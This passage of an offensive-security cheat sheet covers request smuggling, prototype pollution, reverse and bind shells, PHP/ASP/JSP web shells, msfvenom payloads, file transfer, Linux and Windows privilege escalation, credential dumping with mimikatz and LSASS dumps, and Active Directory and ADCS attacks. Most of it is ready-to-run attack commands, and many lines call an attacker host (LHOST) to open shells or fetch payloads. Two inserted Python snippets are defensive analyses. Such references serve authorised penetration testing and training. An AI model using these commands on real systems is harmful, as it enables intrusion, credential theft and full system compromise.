# Tools: Burp HTTP Request Smuggler extension, smuggler.py
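The two requests above are ambiguous on purpose: a `Content-Length` parser and a `Transfer-Encoding: chunked` parser cut the stream at different places, and whatever is left over is prepended to the next request on that connection. This added example (not from the original page) frames each request both ways so the leftover bytes are visible, and flags the condition a front-end should reject: both headers present at once (RFC 7230 section 3.3.3). The raw requests are constructed copies of the page's examples with CRLF line endings.

```python
# Constructed raw requests reproducing the two shapes on the page (CRLF line endings).
CL_TE = (b"POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 13\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED")
TE_CL = (b"POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 3\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n8\r\nSMUGGLED\r\n0\r\n\r\n")


def parse_request(raw: bytes):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def frame_by_content_length(headers: dict, body: bytes):
    """What a Content-Length parser takes as this request's body, and what it leaves
    on the connection for the next request."""
    n = int(headers[b"content-length"][0])
    return body[:n], body[n:]


def frame_by_chunked(body: bytes):
    """The same split as a Transfer-Encoding: chunked parser sees it."""
    pos, out = 0, b""
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)   # chunk-size, extensions ignored
        pos = line_end + 2
        if size == 0:
            pos = body.index(b"\r\n", pos) + 2              # end of the (empty) trailer section
            return out, body[pos:]
        out += body[pos:pos + size]
        pos += size + 2                                     # chunk data plus its CRLF


def is_ambiguous(headers: dict) -> bool:
    """Both framings present: a smuggling indicator that a front-end should reject
    (or normalise to one framing) instead of forwarding as-is."""
    return b"content-length" in headers and b"transfer-encoding" in headers


def analyse(raw: bytes) -> dict:
    _, headers, body = parse_request(raw)
    cl_body, cl_rest = frame_by_content_length(headers, body)
    te_body, te_rest = frame_by_chunked(body)
    return {"ambiguous": is_ambiguous(headers), "cl": (cl_body, cl_rest),
            "te": (te_body, te_rest), "desync": cl_rest != te_rest}


if __name__ == "__main__":
    for name, raw in (("CL.TE", CL_TE), ("TE.CL", TE_CL)):
        r = analyse(raw)
        print(name, "ambiguous:", r["ambiguous"], "CL leftover:", r["cl"][1], "TE leftover:", r["te"][1])
```

For CL.TE the chunked parser leaves `SMUGGLED` on the connection while the Content-Length parser leaves nothing; for TE.CL the roles reverse. A proxy that either rejects ambiguous requests or re-serialises the body with a single framing before forwarding removes the disagreement.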

Prototype Pollution

javascript
// Server-side JavaScript
{"__proto__": {"isAdmin": true}}
{"constructor": {"prototype": {"isAdmin": true}}}
 
// Via JSON merge in API:
POST /api/user HTTP/1.1
Content-Type: application/json
{"__proto__": {"shell": "/proc/self/exe", "NODE_OPTIONS": "--require /proc/self/environ"}}

4. Shells & File Transfers

Reverse Shells

Bash

bash
bash -i >& /dev/tcp/LHOST/PORT 0>&1
bash -c 'bash -i >& /dev/tcp/LHOST/PORT 0>&1'

Python

bash
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

PHP

bash
php -r '$sock=fsockopen("LHOST",PORT);exec("/bin/bash -i <&3 >&3 2>&3");'

Perl

bash
perl -e 'use Socket;$i="LHOST";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'

Ruby

bash
ruby -rsocket -e'f=TCPSocket.open("LHOST",PORT).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

bash
nc -e /bin/bash LHOST PORT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc LHOST PORT >/tmp/f

PowerShell

powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('LHOST',PORT);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sendbyte,0,$sendbyte.Length);$s.Flush()};$client.Close()"

Listeners

bash
# Netcat
rlwrap nc -lvnp PORT
 
# Socat
socat TCP-LISTEN:PORT,reuseaddr FILE:`tty`,raw,echo=0
 
# Pwncat (auto-upgrade)
pwncat-cs -lp PORT

Shell Upgrade

bash
# Step 1: Spawn PTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
# or
script /dev/null -c bash
# or
/usr/bin/script -qc /bin/bash /dev/null
 
# Step 2: Background it
Ctrl+Z
 
# Step 3: Fix terminal
stty raw -echo; fg
 
# Step 4: Set environment
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 40 cols 160

Bind Shells

bash
# Target (listening)
nc -lvnp PORT -e /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp PORT >/tmp/f
 
# Attacker (connecting)
nc $IP PORT

Web Shells

PHP

php
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>

ASP/ASPX

asp
<%response.write CreateObject("WScript.Shell").Exec(Request("cmd")).StdOut.ReadAll()%>

JSP

jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

Payloads with msfvenom

bash
# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf -o shell.elf
 
# Windows reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell.exe
 
# Windows DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o shell.dll
 
# MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o shell.msi
 
# PHP
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > shell.php
 
# WAR (Tomcat)
msfvenom -p java/shell_reverse_tcp LHOST=IP LPORT=PORT -f war -o shell.war
 
# ASP
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp
 
# Python
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw

File Transfer Methods

Linux to Linux

bash
# Python HTTP server (attacker)
python3 -m http.server 8000
 
# Download on target
wget http://LHOST:8000/file
curl http://LHOST:8000/file -o file

Linux to Windows

powershell
# PowerShell download
Invoke-WebRequest http://LHOST:8000/file -OutFile C:\temp\file
iwr http://LHOST:8000/file -OutFile C:\temp\file
(New-Object Net.WebClient).DownloadFile('http://LHOST:8000/file','C:\temp\file')
 
# Certutil
certutil -urlcache -f http://LHOST:8000/file C:\temp\file
 
# Bitsadmin
bitsadmin /transfer job /download /priority high http://LHOST:8000/file C:\temp\file

SMB Server

bash
# Start server (attacker)
impacket-smbserver share . -smb2support
impacket-smbserver share . -smb2support -user user -password pass
 
# Access from Windows
copy \\LHOST\share\file C:\temp\file
net use Z: \\LHOST\share /user:user pass

SCP / SSH

bash
# Upload to target
scp file user@$IP:/tmp/file
 
# Download from target
scp user@$IP:/tmp/file ./file

Netcat Transfer

bash
# Receiver
nc -lvnp 9001 > file
 
# Sender
nc RECEIVER_IP 9001 < file

Base64 (small files)

bash
# Encode
base64 -w0 file > file.b64
cat file.b64
 
# Decode on target
echo "BASE64_STRING" | base64 -d > file

5. Linux Privilege Escalation

Automated Enumeration

bash
# LinPEAS (always run first)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# or transfer and run
./linpeas.sh | tee linpeas.txt
 
# LinEnum
./LinEnum.sh -t
 
# linux-exploit-suggester
./linux-exploit-suggester.sh

Manual Enumeration

bash
# System info
uname -a
cat /etc/os-release
cat /proc/version
hostname
 
# Current user
id
whoami
groups
 
# All users
cat /etc/passwd | grep -v nologin
cat /etc/shadow  # if readable
 
# Network
ip a
ss -tlnp        # listening services (check localhost-only!)
netstat -tlnp
cat /etc/hosts
route -n
arp -a
 
# Running processes
ps auxww
ps -ef
 
# Installed software
dpkg -l
rpm -qa

sudo

bash
# Check sudo permissions
sudo -l
 
# Common wins
sudo vim -c '!sh'
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find / -exec /bin/bash \; -quit
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo env /bin/bash
sudo less /etc/shadow   # then !sh
sudo nmap --interactive  # then !sh (old nmap)
 
# LD_PRELOAD (if env_keep+=LD_PRELOAD in sudo -l)
# Compile: gcc -fPIC -shared -o /tmp/pe.so pe.c -nostartfiles
# pe.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid/setuid */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0); setuid(0);
    system("/bin/bash -p");
}
# Run: sudo LD_PRELOAD=/tmp/pe.so <allowed_command>
 
# Check GTFOBins for any sudo binary
# https://gtfobins.github.io/

SUID / SGID Binaries

bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
 
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
 
# Common SUID exploits
# Check each against GTFOBins
 
# Custom SUID binary — check with strings/ltrace/strace
strings /path/to/suid-binary
ltrace /path/to/suid-binary
strace /path/to/suid-binary
 
# Path hijacking (if SUID binary calls commands without full path)
echo '/bin/bash -p' > /tmp/curl
chmod +x /tmp/curl
export PATH=/tmp:$PATH
/path/to/suid-binary
 
# Shared library hijacking
strace /path/to/suid-binary 2>&1 | grep "No such file"
# Compile malicious .so for missing library

Cron Jobs

bash
# Check cron
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*
 
# Check for writable cron scripts
ls -la /path/to/cron/script.sh
 
# Wildcard injection (if cron runs tar with *)
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
 
# PATH abuse (if cron uses relative path)
printf '#!/bin/bash\nbash -i >& /dev/tcp/LHOST/4444 0>&1\n' > /path/command   # printf, not echo: bash's echo does not expand \n
chmod +x /path/command
 
# Monitor for cron with pspy
./pspy64

Capabilities

bash
# Find binaries with capabilities
getcap -r / 2>/dev/null
 
# Common capability exploits
# cap_setuid+ep on python3
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
 
# cap_setuid+ep on perl
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'
 
# cap_net_raw+ep — can sniff traffic
# cap_dac_read_search — can read any file
# cap_net_bind_service — can bind to privileged ports

Writable Files & Directories

bash
# Writable /etc/passwd
echo "root2:$(openssl passwd -1 password):0:0:root:/root:/bin/bash" >> /etc/passwd   # double quotes so $(...) expands
su root2  # password: password
 
# Writable /etc/shadow
mkpasswd -m sha-512 newpassword
# Replace root's hash in /etc/shadow
 
# Writable scripts run by root
find / -writable -type f 2>/dev/null | grep -v proc
 
# World-writable directories
find / -writable -type d 2>/dev/null

Kernel Exploits

bash
# Check kernel version
uname -r
cat /etc/os-release
 
# Use linux-exploit-suggester for matches
./linux-exploit-suggester.sh

Recent CVEs

bash
# CVE-2024-1086 — nf_tables UAF (kernels 5.14-6.6, 99.4% success rate)
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086 && make && ./exploit
 
# CVE-2023-2640 + CVE-2023-32629 — GameOver(lay) (Ubuntu OverlayFS)
git clone https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
./exploit.sh
 
# CVE-2023-32233 — nf_tables UAF (kernels <= 6.3.1)
git clone https://github.com/Liuk3r/CVE-2023-32233
cd CVE-2023-32233 && make && ./exploit
 
# CVE-2023-4911 — Looney Tunables (glibc GLIBC_TUNABLES buffer overflow)
# Affects most glibc-based distros
 
# CVE-2022-0847 — DirtyPipe (kernels 5.8-5.16.11)
# Overwrites read-only files
 
# CVE-2021-4034 — PwnKit (pkexec, almost universal)
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit && ./PwnKit
 
# CVE-2016-5195 — DirtyCow (kernels 2.6.22-4.8.3)

Docker / LXD Group

bash
# Docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
 
# LXD group
lxc init ubuntu:18.04 privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bash

NFS

bash
# Check for no_root_squash
cat /etc/exports
showmount -e $IP
 
# Exploit (from attacker machine)
mkdir /tmp/nfs
mount -t nfs $IP:/share /tmp/nfs
cp /bin/bash /tmp/nfs/
chmod +s /tmp/nfs/bash
# On target: /share/bash -p

Internal Services

bash
# Check localhost-only services
ss -tlnp
netstat -tlnp
 
# Port forward to access
ssh -L 8080:127.0.0.1:8080 user@$IP
# or with chisel
./chisel client LHOST:9001 R:8080:127.0.0.1:8080

Credential Hunting

bash
# Config files
find / -name "*.conf" -o -name "*.config" -o -name "*.cfg" 2>/dev/null | xargs grep -l "pass" 2>/dev/null
find / -name "*.php" -o -name "*.py" -o -name "*.js" 2>/dev/null | xargs grep -il "password\|passwd\|db_pass" 2>/dev/null
 
# History files
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
 
# SSH keys
find / -name "id_rsa" -o -name "id_ed25519" -o -name "authorized_keys" 2>/dev/null
 
# Environment variables
env
cat /proc/*/environ 2>/dev/null
 
# Database credentials
cat /var/www/html/wp-config.php
cat /var/www/html/.env
cat /etc/mysql/debian.cnf
 
# Always try password reuse across users!
su - <other_user>

Linux Privesc Checklist

  1. sudo -l
  2. SUID binaries
  3. Cron jobs
  4. Capabilities
  5. Kernel CVEs
  6. Docker/LXD group
  7. Writable /etc/passwd
  8. Internal services (ss -tlnp)
  9. NFS no_root_squash
  10. Credential hunting

6. Windows Privilege Escalation

Automated Enumeration

powershell
# WinPEAS (always run first)
.\winPEASx64.exe
 
# PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks
 
# SharpUp
.\SharpUp.exe audit
 
# Seatbelt
.\Seatbelt.exe -group=all

Manual Enumeration

powershell
# System info
systeminfo
hostname
[environment]::OSVersion.Version
 
# Current user
whoami
whoami /priv
whoami /groups
net user %USERNAME%
 
# All users & groups
net user
net localgroup
net localgroup administrators
 
# Network
ipconfig /all
route print
arp -a
netstat -ano
 
# Processes & services
tasklist /svc
Get-Process
Get-Service
wmic service get name,displayname,pathname,startmode
 
# Installed software
wmic product get name,version
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*
 
# Patches
wmic qfe
Get-HotFix
 
# Scheduled tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 
# Password policy
net accounts
 
# AV status
Get-MpComputerStatus
sc query windefend

Token Privileges

SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege

powershell
# Check
whoami /priv
 
# Potato attacks (pick based on OS)
# JuicyPotato — Server 2016/2019, Win 10 < 1809
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe LHOST 4444 -e cmd.exe" -t *
 
# PrintSpoofer — Win 10 / Server 2019+
.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "c:\temp\nc.exe LHOST 4444 -e cmd"
 
# GodPotato — Universal (Win 8-11, Server 2012-2022)
.\GodPotato.exe -cmd "cmd /c c:\temp\nc.exe LHOST 4444 -e cmd"
 
# SweetPotato
.\SweetPotato.exe -p c:\temp\nc.exe -a "LHOST 4444 -e cmd"

CoercedPotato (when Print Spooler is stopped)

powershell
.\CoercedPotato.exe -cmd "cmd /c whoami"
.\CoercedPotato.exe --revshell -l LHOST -p LPORT

EfsPotato (MS-EFSR based)

powershell
.\EfsPotato.exe "whoami"

SigmaPotato (in-memory, .NET reflection)

powershell
.\SigmaPotato.exe --revshell LHOST LPORT

Potato Family Quick Reference

| Tool          | Target OS                        | When to Use              |
|---------------|----------------------------------|--------------------------|
| GodPotato     | Win 8-11, Server 2012-2022       | Universal first try      |
| PrintSpoofer  | Win 10/Server 2019+              | Spooler running          |
| CoercedPotato | Modern Windows                   | Spooler stopped          |
| SigmaPotato   | Multiple                         | Need in-memory execution |
| JuicyPotato   | Server 2016/2019, Win 10 < 1809  | Old systems              |
| SweetPotato   | Multiple                         | Alternative              |
| RoguePotato   | Multiple                         | Outbound SMB allowed     |
| EfsPotato     | Multiple                         | EFS-based                |

SeBackupPrivilege

powershell
# Copy SAM and SYSTEM
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
 
# Extract hashes on attacker
secretsdump.py -sam SAM -system SYSTEM LOCAL
 
# Or copy ntds.dit from DC
robocopy /B C:\Windows\NTDS .\ntds ntds.dit

SeTakeOwnershipPrivilege

powershell
takeown /f C:\Windows\System32\config\SAM
icacls C:\Windows\System32\config\SAM /grant %USERNAME%:F

SeDebugPrivilege

powershell
# Dump LSASS
procdump.exe -accepteula -ma lsass.exe lsass.dmp
 
# Or use mimikatz
privilege::debug
sekurlsa::logonpasswords

Service Exploits

Unquoted Service Paths

powershell
# Find
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
 
# Exploit — place binary in writable path segment
# C:\Program Files\My App\Service.exe
# → Try placing: C:\Program.exe or C:\Program Files\My.exe
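The `findstr` chain above lists candidate services; deciding which directories actually need an ACL review means enumerating the intermediate paths Windows tries before the real binary (`C:\Program.exe`, `C:\Program Files\My.exe`, ...). This added example (not from the original page) computes that list for each auto-start service and applies the same exclusions as the one-liner. The service list is a constructed sample shaped like `wmic service get name,pathname,startmode` output.

```python
import re

# Constructed sample shaped like `wmic service get name,pathname,startmode` output.
SERVICES = [
    ("MyAppSvc", r"C:\Program Files\My App\Service.exe", "Auto"),
    ("QuotedSvc", r'"C:\Program Files\Other App\svc.exe" -k netsvcs', "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("ManualSvc", r"C:\Tools\Some Tool\tool.exe", "Manual"),
    ("NoSpaces", r"C:\Tools\agent.exe", "Auto"),
]


def hijack_candidates(image_path: str) -> list:
    """Paths CreateProcess tries, in order, before the intended binary when an unquoted
    path contains spaces; each one is a location whose write ACL must be audited."""
    path = image_path.strip()
    if path.startswith('"'):
        return []                                       # quoted: no ambiguity
    m = re.match(r"(?i)(.*?\.exe)(?:\s|$)", path)       # executable part only, arguments dropped
    if not m:
        return []
    parts = m.group(1).split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit(services) -> dict:
    """Mirror the findstr chain: auto-start, outside the Windows directory, unquoted."""
    findings = {}
    for name, path, start in services:
        if start.lower() != "auto":
            continue
        if path.lstrip('"').lower().startswith("c:\\windows\\"):
            continue
        candidates = hijack_candidates(path)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for name, candidates in audit(SERVICES).items():
        print(name)
        for c in candidates:
            print("   would load first if writable:", c)
```

The fix on the service side is to quote the `ImagePath` (`sc config <service> binPath= "\"C:\Program Files\My App\Service.exe\""`); on the filesystem side, verify that none of the listed parent directories grant create rights to non-administrators.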

Weak Service Permissions

powershell
# Check with accesschk
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Users" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
 
# Modify service binary
sc config <service> binPath= "cmd /c net localgroup administrators <user> /add"
sc stop <service>
sc start <service>
 
# Or point to reverse shell
sc config <service> binPath= "C:\temp\nc.exe LHOST 4444 -e cmd.exe"

Weak Registry Permissions

powershell
# Check
accesschk.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\Services
 
# Modify
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\<service> -Name "ImagePath" -Value "C:\temp\nc.exe LHOST 4444 -e cmd"

DLL Hijacking

powershell
# Find missing DLLs
# Use Process Monitor (procmon) to filter:
#   Operation = CreateFile, Result = NAME NOT FOUND, Path ends with .dll
 
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f dll -o hijack.dll
 
# Place in writable directory that's in the DLL search order

AlwaysInstallElevated

powershell
# Check (both must be set to 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 
# Exploit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

Stored Credentials

powershell
# Saved credentials
cmdkey /list
 
# Use saved creds
runas /savecred /user:admin cmd.exe
 
# AutoLogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
 
# Unattend files
dir /s /b C:\*unattend*.xml C:\*sysprep*.xml C:\*unattended*.xml 2>nul
 
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
 
# IIS config
type C:\inetpub\wwwroot\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
 
# Credential files
dir /s /b C:\*.config C:\*.ini C:\*.txt C:\*.xml 2>nul | findstr /i "pass cred"
 
# WiFi passwords
netsh wlan show profile
netsh wlan show profile <SSID> key=clear
 
# DPAPI
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\<file>

UAC Bypass

powershell
# Check UAC level
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
 
# DLL hijacking UAC bypass (e.g., SystemPropertiesAdvanced.exe)
# Place malicious srrstr.dll in user's WindowsApps folder
curl http://LHOST/srrstr.dll -o C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll
SystemPropertiesAdvanced.exe

Credential Extraction

powershell
# Mimikatz
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
lsadump::sam
lsadump::dcsync /user:Administrator
 
# SAM dump
reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
# On attacker: secretsdump.py -sam SAM -system SYSTEM LOCAL
 
# LSASS dump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Or: Task Manager → lsass.exe → Create Dump File
# Then: mimikatz # sekurlsa::minidump lsass.dmp
#        mimikatz # sekurlsa::logonpasswords

Kernel Exploits

powershell
# Check for suggestions
.\windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt
 
# Or use Watson
.\Watson.exe

Windows Privesc Checklist

  1. whoami /priv — SeImpersonate → Potato
  2. Stored creds / runas /savecred
  3. Service misconfigs — unquoted paths, weak perms
  4. AlwaysInstallElevated
  5. Scheduled tasks — writable scripts
  6. Credential hunting — history, configs, DPAPI
  7. DLL hijacking opportunities
  8. Kernel exploits (last resort)

7. Active Directory Attacks

Initial Enumeration

bash
# Null session / anonymous enumeration
netexec smb $IP -u '' -p ''
netexec smb $IP -u 'guest' -p ''
enum4linux -a $IP
rpcclient -U "" -N $IP
 
# RID cycling (find users from null session)
netexec smb $IP -u '' -p '' --rid-brute
lookupsid.py anonymous@$IP -no-pass
 
# LDAP anonymous bind
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com"
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName
 
# DNS
dig @$IP domain.com any
dig @$IP -x $IP

User Enumeration

bash
# Kerbrute (no creds needed)
kerbrute userenum -d domain.com --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
 
# Validate creds
netexec smb $IP -u user -p 'password'
netexec ldap $IP -u user -p 'password'
netexec winrm $IP -u user -p 'password'
 
# Enumerate users with creds
netexec smb $IP -u user -p pass --users
GetADUsers.py -all domain.com/user:pass -dc-ip $IP

Password Attacks

AS-REP Roasting

bash
# Find AS-REP roastable users (no creds)
GetNPUsers.py domain.com/ -usersfile users.txt -no-pass -dc-ip $IP
GetNPUsers.py domain.com/ -no-pass -dc-ip $IP  # auto-find if LDAP allows
 
# With creds
GetNPUsers.py domain.com/user:pass -request -dc-ip $IP
 
# Crack
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

Kerberoasting

bash
# Requires valid domain creds
GetUserSPNs.py domain.com/user:pass -dc-ip $IP -request
GetUserSPNs.py domain.com/user:pass -dc-ip $IP -request -outputfile kerb.hash
 
# Crack
hashcat -m 13100 kerb.hash /usr/share/wordlists/rockyou.txt

Password Spraying

bash
# SMB
netexec smb $IP -u users.txt -p 'Password1' --continue-on-success
netexec smb $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
 
# Kerbrute (faster, less noise)
kerbrute passwordspray -d domain.com --dc $IP users.txt 'Password1'
 
# Be careful with lockout policies!
net accounts /domain
# Or: netexec smb $IP -u user -p pass --pass-pol

BloodHound

bash
# Collection
bloodhound-python -u user -p pass -d domain.com -c all -ns $IP
# Or on target:
.\SharpHound.exe -c all --zipfilename bh.zip
 
# Start BloodHound
sudo neo4j start
bloodhound
 
# Key queries:
# - Find Shortest Paths to Domain Admins
# - Find AS-REP Roastable Users
# - Find Kerberoastable Users
# - Shortest Paths to Unconstrained Delegation
# - Find Principals with DCSync Rights

Lateral Movement

Pass-the-Hash

bash
# SMB exec
psexec.py -hashes :NTHASH domain.com/administrator@$IP
wmiexec.py -hashes :NTHASH domain.com/administrator@$IP
smbexec.py -hashes :NTHASH domain.com/administrator@$IP
atexec.py -hashes :NTHASH domain.com/administrator@$IP 'whoami'
 
# WinRM
evil-winrm -i $IP -u administrator -H NTHASH
 
# NetExec
netexec smb $IP -u administrator -H NTHASH -x 'whoami'
netexec winrm $IP -u administrator -H NTHASH -x 'whoami'

Pass-the-Ticket

bash
# Export ticket from mimikatz
sekurlsa::tickets /export
 
# Inject ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass domain.com/user@target.domain.com
 
# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

WinRM

bash
evil-winrm -i $IP -u user -p 'password'
evil-winrm -i $IP -u user -H NTHASH

RDP

bash
xfreerdp /v:$IP /u:user /p:'password' /cert-ignore +clipboard /dynamic-resolution
xfreerdp /v:$IP /u:user /pth:NTHASH /cert-ignore   # PtH over RDP

ADCS (Active Directory Certificate Services)

bash
# Enumerate ALL vulnerable templates
certipy find -u user@domain.com -p 'pass' -dc-ip $IP -vulnerable
certipy find -u user@domain.com -p 'pass' -dc-ip $IP -vulnerable -stdout

ESC1 — Enrollee Supplies SAN

bash
certipy req -u user@domain.com -p 'pass' -ca 'CA-NAME' \
  -template 'VulnTemplate' -upn 'administrator@domain.com' -dc-ip $IP

ESC3 — Enrollment Agent Template

bash
certipy req -u user@domain.com -p 'pass' -ca CA-NAME -template EnrollmentAgent -dc-ip $IP
certipy req -u user@domain.com -on-behalf-of 'domain\administrator' \
  -pfx user.pfx -template User -ca CA-NAME -dc-ip $IP

ESC4 — Vulnerable Template ACL

bash
certipy template -u user@domain.com -p 'pass' -template VulnTemplate -save-old -dc-ip $IP
# Modify template to ESC1 conditions, exploit, then restore:
certipy template -u user@domain.com -p 'pass' -template VulnTemplate \
  -configuration VulnTemplate.json -dc-ip $IP

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 on CA

bash
certipy req -u user@domain.com -p 'pass' -ca CA-NAME \
  -template User -upn administrator@domain.com -dc-ip $IP

ESC7 — Vulnerable CA ACL (ManageCA + ManageCertificates)

bash
certipy ca -ca CA-NAME -add-officer user -u user@domain.com -p 'pass' -dc-ip $IP
certipy ca -ca CA-NAME -enable-template SubCA -u user@domain.com -p 'pass' -dc-ip $IP
certipy req -u user@domain.com -p 'pass' -ca CA-NAME \
  -template SubCA -upn administrator@domain.com -dc-ip $IP
certipy ca -ca CA-NAME -issue-request <ID> -u user@domain.com -p 'pass' -dc-ip $IP
certipy req -u user@domain.com -p 'pass' -ca CA-NAME -retrieve <ID> -dc-ip $IP

ESC8 — NTLM Relay to HTTP Enrollment

bash
certipy relay -ca ca.domain.com -template DomainController
# Combine with coercion (PetitPotam/DFSCoerce/PrinterBug)

ESC9 — No Security Extension + StrongCertificateBindingEnforcement=1

bash
# Change UPN of controlled user to target, request cert, change UPN back
certipy shadow auto -u user@domain.com -p 'pass' -account victim -dc-ip $IP

ESC10 — Weak Certificate Mapping

bash
certipy req -u user@domain.com -p 'pass' -ca CA-NAME \
  -template VulnTemplate -upn administrator@domain.com -dc-ip $IP

ESC11 — ICPR Without Encryption (RPC-based ESC8)

bash
certipy relay -ca ca.domain.com -template DomainController

ESC12 — CA Key Extraction (requires shell on CA)

bash
certipy ca -backup -u user@domain.com -p 'pass' -ca CA-NAME -dc-ip $IP -target $CA_HOST
certipy forge -ca-pfx CA-NAME.pfx -upn administrator@domain.com -subject 'CN=Administrator'

ESC13 — Issuance Policy Linked to Group

bash
certipy req -u user@domain.com -p 'pass' -ca CA-NAME -template ESC13Template -dc-ip $IP

ESC14 — Explicit Certificate Mapping

bash
